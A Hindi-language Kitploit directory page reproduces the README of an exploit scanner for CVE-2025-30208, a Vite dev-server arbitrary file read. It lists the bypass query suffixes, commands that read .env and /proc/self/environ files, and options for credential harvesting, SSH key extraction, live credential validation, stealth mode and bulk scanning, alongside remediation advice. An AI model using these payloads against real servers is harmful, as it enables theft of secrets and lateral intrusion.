Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
CVE-2025-30208 — CVE-2025-30208 (Vite आर्बिट्रेरी फ़ाइल रीड) के लिए शोषण स्कैनर, मल्टी-वेरिएंट बाईपास डिटेक्शन, क्रेडेंशियल हार्वेस्टिंग, SSH कुंजी निष्कर्षण, और अधिकृत पेनेट्रेशन परीक्षण के लिए संरचित रिपोर्टिंग के साथ। | Kitploit
उपकरण/GitHubGitHub/hazavvip/cve-2025-30208
भेद्यता विश्लेषणशोषणवेब एप्लिकेशन शोषणडेटा निष्कासनजानकारी एकत्र करनापेनिट्रेशन टेस्टिंग
GitHubhazavvip/cve-2025-30208

CVE-2025-30208

CVE-2025-30208 (Vite आर्बिट्रेरी फ़ाइल रीड) के लिए शोषण स्कैनर, मल्टी-वेरिएंट बाईपास डिटेक्शन, क्रेडेंशियल हार्वेस्टिंग, SSH कुंजी निष्कर्षण, और अधिकृत पेनेट्रेशन परीक्षण के लिए संरचित रिपोर्टिंग के साथ।

रिपॉजिटरी देखें
104 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2025-30208 — Vite मनमानी फ़ाइल रीड · v5

CVE: CVE-2025-30208
GHSA: GHSA-x574-m823-4x7w
गंभीरता: CVSS 5.3 Medium (नेटवर्क-सुलभ dev सर्वर)

⚠ केवल अधिकृत सुरक्षा परीक्षणों के लिए।
उन प्रणालियों के विरुद्ध अनधिकृत उपयोग, जिनके आप स्वामी नहीं हैं या जिनके परीक्षण की स्पष्ट लिखित अनुमति आपके पास नहीं है, अवैध है।


विवरण

Vite का dev सर्वर /@fs/ अनुरोधों के माध्यम से होस्ट फ़ाइल सिस्टम से मनमानी फ़ाइलें प्रदान करने की अनुमति देता है।
प्रभावित संस्करणों में query-string सैनिटाइज़ेशन जाँच की कमी हमलावर को allow-list को बायपास करने के लिए विशेष रूप से निर्मित सफ़िक्स जोड़ने और प्रक्रिया द्वारा एक्सेस की जा सकने वाली किसी भी फ़ाइल को पढ़ने की अनुमति देती है — जिसमें .env फ़ाइलें, SSH निजी कुंजियाँ, क्लाउड क्रेडेंशियल्स और /proc प्रविष्टियाँ शामिल हैं।


प्रभावित संस्करण

शाखाअंतिम संवेदनशीलपैच किया गया
6.3.x6.3.06.3.1+
6.2.x6.2.26.2.3+
6.1.x6.1.16.1.2+
6.0.x6.0.116.0.12+
5.4.x5.4.145.4.15+
4.5.x4.5.94.5.10+

बायपास वेरिएंट

नामसफ़िक्स / क्वेरीविवरण
raw???raw??अंतिम ?? rawRE को तोड़ता है
import&raw???import&raw??ES मॉड्यूल + raw संयुक्त
raw??raw?एकल अंतिम ?
url&raw???url&raw??URL मोड संयुक्त
raw&url???raw&url??उल्टा पैरामीटर क्रम
import&?raw?import&?rawविकृत import उपसर्ग
sec-fetch?raw + Sec-Fetch headerब्राउज़र स्क्रिप्ट संदर्भ
raw-encoded?raw%3f%3fURL-एन्कोडेड विभाजक
double-slash?raw??/डबल-स्लैश सफ़िक्स बायपास (v5)
pct-all%3fraw%3f%3fपूर्णतः percent-एन्कोडेड क्वेरी (v5)
raw-hash?raw??#फ़्रैगमेंट एंकर बायपास (v5)
wasm-init?inline=1.wasm?initCVE-2025-31125 संबंधित भेद्यता (wasm init)

स्थापना

root@kitploit:~
pip install requests
# or
pip install -r requirements.txt

उपयोग

एकल लक्ष्य — पूर्ण स्कैन

root@kitploit:~
python main.py -t https://target.com

पूर्ण शोषण श्रृंखला (लाइव क्रेडेंशियल सत्यापन, डिफ़ॉल्ट व्यवहार)

root@kitploit:~
python main.py -t https://target.com --full-chain --output /tmp/report

कोई विशिष्ट फ़ाइल पढ़ें

root@kitploit:~
python main.py -t https://target.com --file /app/.env
python main.py -t https://target.com --file /proc/self/environ --save ./environ.txt

स्टील्थ मोड (यादृच्छिक विलंब) + अपस्ट्रीम प्रॉक्सी

root@kitploit:~
python main.py -t https://target.com --stealth --proxy http://127.0.0.1:8080

लक्ष्य सूची से बल्क स्कैन

root@kitploit:~
python main.py -l targets.txt
python main.py -l targets.txt --workers 20 --ports 5173,3000,8080

पाइप-अनुकूल आउटपुट (कोई ANSI कोड नहीं)

root@kitploit:~
python main.py -t https://target.com --no-color | tee scan.log

संस्करण

root@kitploit:~
python main.py --version

पैकेज के रूप में चलाएँ

root@kitploit:~
python -m cve30208 -t https://target.com

CLI संदर्भ

फ़्लैगडिफ़ॉल्टविवरण
-t/--target—एकल लक्ष्य URL
-l/--lists—ऐसी फ़ाइल जिसमें प्रति पंक्ति एक लक्ष्य हो
--stealthoffअनुरोधों के बीच यादृच्छिक विलंब जोड़ें
--proxy—HTTP/HTTPS प्रॉक्सी (http://host:port)
--timeout10प्रति-अनुरोध टाइमआउट (सेकंड में)
--verifyoffTLS प्रमाणपत्र सत्यापन सक्षम करें
--file—लक्ष्य होस्ट पर कोई विशिष्ट पथ पढ़ें
--save—--file की सामग्री को स्थानीय पथ पर सहेजें
--full-chainonपूर्ण शोषण श्रृंखला चलाएँ (लाइव सत्यापन डिफ़ॉल्ट है)
--output—JSON + Markdown रिपोर्ट को इस आधार पथ पर लिखें
--workers10बल्क स्कैन के लिए समानांतर वर्कर्स
--portssee belowबल्क मोड में जाँचे जाने वाले अल्पविराम-पृथक पोर्ट
--no-color/--plainoffANSI रंग कोड अक्षम करें
--safe-modeoffटर्मिनल आउटपुट में गोपनीय मान संपादित करें
--show-secretsoffपूर्ण टर्मिनल गोपनीय दिखाएँ (--safe-mode को ओवरराइड करता है)
--version—संस्करण प्रिंट करके बाहर निकलें

डिफ़ॉल्ट बल्क-स्कैन पोर्ट: 5173, 4173, 3000, 8080, 8000, 4000, 5000, 9000, 80, 443


आउटपुट

जब --output /tmp/report निर्दिष्ट किया जाता है तो स्कैनर लिखता है:

  • /tmp/report.json — मशीन-पठनीय संरचित निष्कर्ष
  • /tmp/report.md — मानव-पठनीय Markdown रिपोर्ट

बल्क स्कैन आसान शेल स्क्रिप्टिंग के लिए अंतिम पंक्ति में हमेशा VULN_COUNT=N प्रिंट करता है:

root@kitploit:~
python main.py -l targets.txt | grep '^VULN_COUNT='

एकल-लक्ष्य स्कैन स्वचालन के लिए अंत में SCAN_STATUS=VULNERABLE|NOT_VULNERABLE प्रिंट करते हैं।


आर्किटेक्चर (v5)

root@kitploit:~
cve30208/
├── __init__.py      — public API surface
├── __main__.py      — python -m cve30208 entry point
├── constants.py     — BYPASS, CVE_SIBLING, SECRET_PATTERNS, SSH/scan constants
├── ui.py            — ANSI colour codes, Spin/NullSpin, terminal helpers
├── utils.py         — shared helpers (_unescape_js_string)
├── secrets.py       — scan_secrets(), parse_env(), parse_environ()
├── ssh.py           — extract_ssh_key(), collect_ssh_targets()
├── exploit.py       — ExploitResult, ExploitStage (live credential validation)
│                      includes a check registry for easier extension
├── report.py        — save_report(), make_md()
└── scanner.py       — FR/R dataclasses, Scanner, bulk_scan(), main()
main.py              — backwards-compatibility shim
requirements.txt

डीडुप्लिकेशन

स्कैनर दोहराए गए आर्टिफैक्ट्स को स्वचालित रूप से दबा देता है ताकि आउटपुट साफ़ बना रहे, भले ही HOME /root के बराबर हो या वही गोपनीय कई फ़ाइलों में दिखाई दे:

परततंत्र
फ़ाइल सिस्टम रीडstage_fs SSH-कुंजी आधार सूची को dict.fromkeys के साथ सामान्यीकृत करता है और कोई भी आउटपुट उत्पन्न करने से पहले reads कतार से डुप्लिकेट पथ हटा देता है।
फ़ाइल सहेजनाScanner._save प्रति-स्कैन _seen_file_paths सेट की जाँच करता है; डुप्लिकेट पथ r.files में पुनः जोड़े बिना पहले से संग्रहीत FR लौटाते हैं।
गोपनीयScanner._save सभी फ़ाइलों में (name, value) द्वारा r.secrets को वैश्विक रूप से डीडुप्लिकेट करता है; फ़ाइल-आंतरिक डीडुप scan_secrets में अलग से संभाला जाता है।
SSH कुंजियाँstage_ssh समान PEM हस्ताक्षर (पहले _PEM_SIG_LEN बाइट्स) वाली कुंजियों को समेट देता है जो कई स्रोत फ़ाइलों में दिखाई देती हैं।
पिवट कमांडपिवट ब्लॉक (key_source, host, port) द्वारा कुंजीबद्ध होते हैं; समान संयोजन केवल एक बार प्रिंट होते हैं।

सारांश पंक्ति बताती है कि कितनी फ़ाइलें, गोपनीय और SSH कुंजियाँ डुप्लिकेट के रूप में दबाई गईं, उदा.:

root@kitploit:~
  deduped     2 file(s), 4 credential(s), 1 SSH key(s) suppressed as duplicates

निवारण

  1. Vite को अपग्रेड करें अपनी शाखा के लिए पैच किए गए संस्करण पर (ऊपर तालिका देखें)।
  2. अविश्वसनीय नेटवर्क पर Vite dev सर्वर को --host 0.0.0.0 के साथ कभी प्रारंभ न करें।
  3. उन सभी गोपनीयों को बदलें जो संभावित रूप से उजागर हुए थे (API कुंजियाँ, DB पासवर्ड, SSH कुंजियाँ)।
  4. .env फ़ाइलों का ऑडिट करें और प्रोजेक्ट से अनावश्यक गोपनीय हटाएँ।

कानूनी

यह टूल केवल अधिकृत पेनेट्रेशन परीक्षण और सुरक्षा अनुसंधान के लिए प्रदान किया जाता है।
इस टूल का उपयोग करके आप सहमत हैं कि आपके पास लक्ष्य प्रणालियों के परीक्षण की स्पष्ट लिखित अनुमति है।
लेखक इस सॉफ़्टवेयर के किसी भी दुरुपयोग या क्षति के लिए कोई दायित्व स्वीकार नहीं करते हैं।


CVE-2025-30208 PoC v5

JSON स्कीमा नोट

उत्पन्न JSON में अब शामिल है:

  • schema_version (वर्तमान: 1.0.0)
  • status (VULNERABLE या NOT_VULNERABLE)
  • safe_mode (true जब टर्मिनल गोपनीय संपादन मोड सक्षम था)
  • report_redacted (true जब कम से कम एक गोपनीय मौजूद था और संग्रहीत रिपोर्टों में संपादित किया गया था)
  • संग्रहीत गोपनीय मान हमेशा JSON/Markdown रिपोर्ट फ़ाइलों में संपादित किए जाते हैं
टूल डाउनलोड करें